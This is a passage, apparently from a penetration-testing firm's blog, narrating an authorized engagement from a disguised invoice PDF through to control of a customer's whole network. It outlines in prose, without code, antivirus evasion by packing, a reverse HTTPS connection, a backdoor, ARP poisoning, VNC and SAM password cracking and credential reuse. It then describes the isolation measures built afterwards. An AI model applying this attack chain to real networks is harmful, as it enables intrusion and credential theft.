Before we sent the PDF to the our customer we checked it against the same Antivirus Technology that they were using to ensure that it was not detected as malware or a virus. To evade the scanners we had to “pack” our pseudo-malware in such a way that it would not be detected by the scanners. Once that was done and tested, we were ready to launch our attack.

When we sent the PDF to our customer, it didn’t take long for the victim in AP/AR to open it, after all it appeared to be a trusted invoice. Once it was opened, the victim’s computer was compromised. That resulted in it establishing a reverse connection to our lab which we then tunneled into to take control of the victims computer (all via HTTPS).

Once we had control, our first order of operation was to maintain access. To do this we installed our own backdoor technology onto the victims computer. Our technology also used outbound HTTPS connections, but for authenticated command retrieval. So if our control connection to the victims computer was lost, we could just tell our backdoor to re-establish the connection.

The next order of operation was to deploy our suite of tools on the compromised system and to begin scoping out the internal network. We used selective ARP poisoning as a first method for performing internal reconnaissance. That proved to be very useful as we were able to quickly identify VNC connections and capture VNC authentication packets. As it turns out, the VNC connections that we captured were being made to the Active Directory (“AD”) server.

We were able to crack the VNC password by using a VNC Cracking Tool. Once that happened we were able to access, the AD server and extract the servers SAM file. We then successfully cracked all of the passwords in that file, including the historical user passwords. Once the passwords were cracked, we found that the same credentials were used across multiple systems. As such, we were not only able to access desktops and servers, but also able to access Cisco devices, etc.

In summary, we were able to penetrate into our customers IT Infrastructure and effectively take control of the entire infrastructure without being detected. We accomplished that by avoiding conventional methods for penetration and by using our own unorthodox yet obviously effective penetration methodologies.

This particular engagement was interesting as our customers goal was not to identify all points of risk, but instead was to identify how deeply we could penetrate. Since the engagement, we’ve worked with that customer to help them create barriers for isolation in the event of penetration. Since those barriers have been implemented, we haven’t been able to penetrate as deeply.

As usual, if you have any questions or comments, please leave them on our blog. If there’s anything you’d like us to write about, please email me the suggestion. If I’ve made a grammatical mistake in here… I’m a hacker not an English major.